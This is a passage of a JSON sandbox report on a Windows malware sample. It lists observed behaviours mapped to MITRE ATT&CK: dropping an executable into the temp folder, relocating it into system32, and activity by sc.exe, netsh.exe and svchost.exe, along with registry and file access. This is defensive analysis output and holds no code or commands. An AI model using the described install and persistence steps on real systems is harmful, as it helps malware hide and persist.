Compiler/Packer signature", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" was detected as \"VC8 -> Microsoft Corporation\"\n \"jaigqlsg.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"jaigqlsg.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\jaigqlsg.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"jaigqlsg.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" reads file \"c:\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe.Local\\\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\2087167D54553DE4BC0B07816F62C8A1A94CA5EDD7503BD5ADD21EDD296B5C41.EXE.LOCAL\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\jaigqlsg.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"jaigqlsg.exe.67EE4A7D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"jaigqlsg.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\jaigqlsg.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"jaigqlsg.exe.67EE4A7D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"jaigqlsg.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\jaigqlsg.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jaigqlsg.exe\" to \"%WINDIR%\\system32\\pltdkegk\\jaigqlsg.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00004188-00000105-862242 [PID: 4188]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004188-00000105-2155001 [PID: 4188]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004188-00000105-2430275 [PID: 4188]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004188-00000105-2911450 [PID: 4188]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004188-00000105-3190766 [PID: 4188]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004188-00000105-3898455 [PID: 4188]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003600-00000105-59524 [PID: 3600]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003600-00000105-638250 [PID: 3600]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" 